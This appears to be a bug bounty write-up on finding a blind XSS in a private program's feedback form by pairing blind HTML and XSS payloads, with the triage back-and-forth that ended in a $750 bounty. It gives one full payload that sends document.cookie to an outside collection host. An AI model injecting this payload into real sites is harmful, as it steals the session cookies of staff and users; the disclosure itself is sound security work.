N/a to $750 bounty for a Blind XSS.
Without wasting any time, I try to keep everything to the point.
It’s a private program, so we call it www.target.com.
Vulnerable form: Feedback form on www.target.com
I use www.blindf.com to find the blind XSS. You can use your own VPS to receive the response.
My methodology to find the BXSS:
My experience says that the basic BXSS payload
does not work many times. Also, any other payload that extracts dom or page source code doesn’t work many times. So to find the BXSS, I use blind HTML payloads
How I found this bug:
- I used BHTML payload
in every text field of the feedback form on www.target.com/feedback.
- After some days, www.blindf.com received a response from the vulnerable server.
- I went ahead and put the basic BXSS payload
to find the BXSS. Because at this point, I knew that the form was vulnerable.
- I waited for 20 days but did not receive a response.
- Then I used a trick. I put blind HTML payload
and submitted the form. I resubmitted the form with my basic BXSS payload too. It means I submitted the form twice, the first time with BHTML payload and the second time with a BXSS payload.
- After some time, I received a response from my BHTML payload, but the BXSS payload did not send any response. I understand that my BXSS payload has failed and it will not send any response now. Because both payloads were submitted on the same day, they should be fired at the same time.
- www.blindf.com provides other payloads too, with a minimum JS execution. I used a different payload that only extracts cookies and not any DOM values from the page.
“><img src=https://blindf.com/a.jpg onload=this.src=’https://blindf.com/oc.php/?c='+document.cookie>
- This payload was executed and I received the basic cookie.
- Bug Submitted
- Triager tried to reproduce the bug but failed. So he closed my bug as N/a.
- I raised the issue. Another triager used a famous website that is used to find the BXSS but did not receive any response.
- Again closed as N/a
- I raised the issue again and provided my www.blindf.com account credentials to him to reproduce the bug.
- I asked him to fill out the form twice, the first time with the BHTML payload and the second time with the BXSS (Cookie extraction) payload.
- Payloads were executed and www.blindf.com received the response from both payloads.
- Bounty received $750
So, after closing my bugs as N/a two times. I finally received the bounty.
Thank you for reading my boring stuff and tolerate my bad English